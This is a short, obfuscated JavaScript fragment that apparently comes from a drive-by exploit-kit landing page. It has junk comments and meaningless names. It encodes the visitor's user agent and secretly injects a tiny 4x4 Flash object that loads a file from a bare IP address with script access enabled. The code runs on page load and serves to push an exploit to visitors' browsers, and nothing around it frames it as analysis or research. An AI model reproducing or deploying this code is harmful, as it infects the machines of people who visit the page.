/*s50717d35045hssfj57400fs*/function hgfgerdfgdf(num, width){/*s92004d61932hfj40707fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s71289d48710hfj89254fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s55577d5706hfj15386fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s96512d89742hfj44636fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd84365hfs*/c += b + d;/*s51216d28913hfj10111fs*/e += 1;}return c;}/*s57475dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.171/?ODExMzQzNTQ=&elsa=cylI9fVlsapaj6iEOGzxecgJbR9BSNZwgWrpDGQLNviV_8mrMcJsogwReEvGADnestVlgU4AsQrKyIUaOf&rand=xH_QMrPYbR7FFYPfKPnEUKREMU3WA0SKwYyZha_VF5-xFDfGpbL1FxzspV-dCFyEmvFvdLAHIwGh1UfASw&info=MTYyNTQzNTI=&fore=NDAwODI1MzE=", ghnvbn("http://188.225.33.171/?NTM2NDk0MDU=&rand=xHzQMrPYbR7FFYDfKPrEUKREMU3WA0SKwYyZhazVF5yxFDTGpbH1Fx_spVydCFyEmvJvdLAHIwKh1UTASwc&info=MjIwMzg5MDQ=&elsa=ylI9fVlgapaj6iECGzxScgJbR9BSNZwsWrpDGQLNviV_8mrAcJskgwRSEvGADnestU1sR6QgWnKz7S6OJrg&befe=Mzg0NzUwODI=","gexywoaxor"));